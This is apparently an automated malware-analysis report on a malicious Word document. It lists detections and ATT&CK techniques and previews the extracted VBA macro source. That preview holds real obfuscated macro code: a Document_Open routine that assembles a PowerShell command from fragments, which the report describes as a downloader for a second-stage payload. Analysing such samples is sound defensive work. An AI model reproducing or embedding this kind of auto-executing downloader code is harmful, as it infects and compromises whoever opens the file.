MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro that executes a Shell() command. This command constructs and runs a PowerShell command, which is designed to download and execute a second-stage payload. The specific PowerShell command constructed is 'powershell -JO in (Chr(34) + "-JO" + "in (" + "3" + "6B80" + "Z122")'. This indicates a macro-based downloader, likely delivered via spearphishing.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6609044-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6609044-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34696 bytes |
SHA-256: f0bfe68020c8628a0235339c7f3bce720f19c38ea1778299976ee244cc6ef64f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ZFAjKccCNMYa"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
TJYnh = RwZXF * PlBTvc - (fkaRn - 98475)
AhrQUR = QqFDhu * WlUEiS - (kPXzjA - 35731)
GLass = oRkwhk * YFjzG - (oNrKO - 91660)
RfiVjXPUM = Application.Run("uUtAGYZdWAiWiQ", "" + RoQhYfluJG + UVfLMNViWf + PBMGzOAtpK + GzvDoGH + sHRadGYjDB + imNWAXhs + RuBRrHSj + bjrduYIj + DlwXEiYWkJt + QdkhF + GRJFn + TnZGqoopuw + RWhXTHj + sjOqJG + unwmDtaMFtCZ + kXouFoHliPVwKP)
YZOoPi = dmhlKo * HoTNj - (IvOCkX - 62774)
HjLLt = POPbnZ * MsqOGY - (kauIO - 72033)
wmKDX = wvhNzt * GElWPH - (aBAldJ - 16359)
End Sub
Attribute VB_Name = "DzHAiqpNzJPmO"
Function PBMGzOAtpK()
On Error Resume Next
iaOtao = 25249 - Aiizk + 16741 + WQhZY * WHkfms - vVNla + vvQXWr + 11277 * vzaSzr + 81732 - mdSXwM / dNovG * (47999 / UwWKNG)
tHttzBKHK = "" + hShaKKNo + HijSDbicn + "POW" + vzVPcdvnikht + EQlJSAzvpQzk + "er" + iidSjcmSL + hRBVjaoQizLw + "She" + IiAKESszcF + PKrwlFb + "LL " + jwZIqITvUXhK + tlIGsphpwVa + " " + ZjNGVsjZkbB + YDHiSvSj + Chr(34) + "-JO" + cwilDtCDi + uLGQLSNAJJG + "in (" + RdhODisubWkH + fjhYThjd + "'3" + RHdEjoD + AUZMoAD + "6B80" + TpVJYLiUblnL + mfwvAnLmTOBmm + "Z122"
PBMGzOAtpK = "" + sXPszJCfIi + OMRiuzfnjr + tHttzBKHK
ITazAS = 19329 - ivMac - BboQo - 46528 * 67373 + zXfpFN / 13841 * bqJATO * 97294 * wajAv * wBUzC + ObjKr
AXhVG = 13833 - ZcAjOY - DijAo - 24866 * 65796 + wZCjH / 73595 * SnBSL * 85152 * bhYAwt * NdCJbw + EjCrV
End Function
Function GzvDoGH()
On Error Resume Next
kDAUL = 34047 - bsjFi - BooFB - 86638 * 53634 + waHssc / 2442 * TUrwIC * 82056 * SOTbn * uWZRU + XWawN
TKMwG = 69098 - WQbjn - mUOoiA - 84875 * 52230 + VHLCjz / 20113 * JHuvhl * 26483 * uLnZkt * ObcHS + IMbbp
zOiBUHooVD = "" + tbToQjZMNlr + dmnZAFafkTaIjX + "Z1" + uiwONRquiLGwiI + WXujnXNGNz + "06r" + sjjIcSTC + jLvsvozdzbjA + "61{1" + dNGXVpBP + BzczUPpkinni + "10Z1" + bYHjAhcrvZfOMv + hUDNqzM + "01"
sDPwHR = 70389 - rwiZoF - hPCvTA - 79943 * 26906 + TXkBW / 44099 * EoWFAV * 83396 * izuYHw * rpLBnd + YzCpOi
ilvWz = 42882 - ZLvwiR - aGJCC - 35255 * 10760 + uDYFS / 59178 * EiMFaS * 92079 * VzDlpA * kXQEdH + uKiDfr
iFUJak = (AwMYI + TGQGD) / (fvpVjJ + PYCKG - 23897 + BQoEw * (46803 / 94411 / 49371 * NpPUjF))
OYPPICfIqqz = "" + LtEltklARUtz + LzLCSMH + "d119"
NsKYMZ = (BvQUA + IqAPO) / (jGzBn + RUJPa - 20340 + bYLhR * (15242 / 85056 / 49068 * PIBps))
FGbfTp = (KhQbv + EPXET) / (Gcjqak + UXDZZ - 52631 + EzfRER * (20564 / 87146 / 20509 * hLJsv))
FjDlUauvtKr = "" + LuiqMXOqWLuFG + FvZizJiHWf + "h45!" + qAzUNQSDjjiOB + uwzUJdnvuSVGh + "11" + HKtjXpZqjoni + NLhASoKYLJ + "1h9" + FDCsKkb + YUUYAUFQfV + "8i10" + VhGnFOnbizjTVk + odDGuBoqMcSTF + "6s" + nSDjWvEFWnS + lBDQwRcBSo + "101h" + sQadwUWaTv + AAtjYjTbL + "99" + LYBVoji + wOiidcZTwOF + "r116" + lQwXsdm + JcKPEuwiupa + "s3" + lVOFvHzfwK + nlWQnAiJ + "2i78" + BUOXiUN + PiRicJmhi + ">10" + MRvERJcRGorNwf + rYciSbtAjVGtHB + "1i11"
nXtkY = (GVsvO + XRSzIO) / (JBqfkX + YvCiKF - 42587 + ZbljVh * (33325 / 14488 / 74033 * NScOC))
SpSECwoQ = "" + FICwsJMdlLSJl + jsrNZtN + "6{4" + EIXFRJsvzSzNlc + XrwGpdlDMtW + "6{8" + MzsQHsjlHMcSXL + swPIkBBR + "7d10" + bXTsYmj + SGwdkzqPfTnR + "1Z98" + sUuHDJKza + RLROnpl + "d67" + ADvUfIulWzw + FbXifdsb + "d10" + SbTnYBsiBwr + ZZbuOYacfOGGq + "8!10"
GzvDoGH = "" + KIdwiXdt + VkiTwrSnmw + zOiBUHooVD + idDuDmM + iKjUtSsnRvjP + OYPPICfIqqz + nwJiXoSErEGaA + UqjAnnZuzDYa + FjDlUauvtKr + CXoIkPwtEo + dSiNTSzDw + SpSECwoQ
PmFNBJ = (wNSjoj + SQfla) / (scYJGP + kGdwXz - 46403 + ViBwj * (49222 / 80759 / 19516 * udzvBC))
End Function
Function sHRadGYjDB()
On Error Resume Next
UHnNw = (lYusk + LrItw) / (ioqMCR + PdSpjD - 22983 + BdQlHh * (89759 / 20909 / 22471 * zZailp))
RhVESiE = "" + mdfHFVkjd + KoYqJOsHpEjd + "5B10" + EsChrcnfnZBW + QWBQrdVI + "1d11" + YXzvPMDzAbAc + mqvfBzontjqSCS + "0s"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.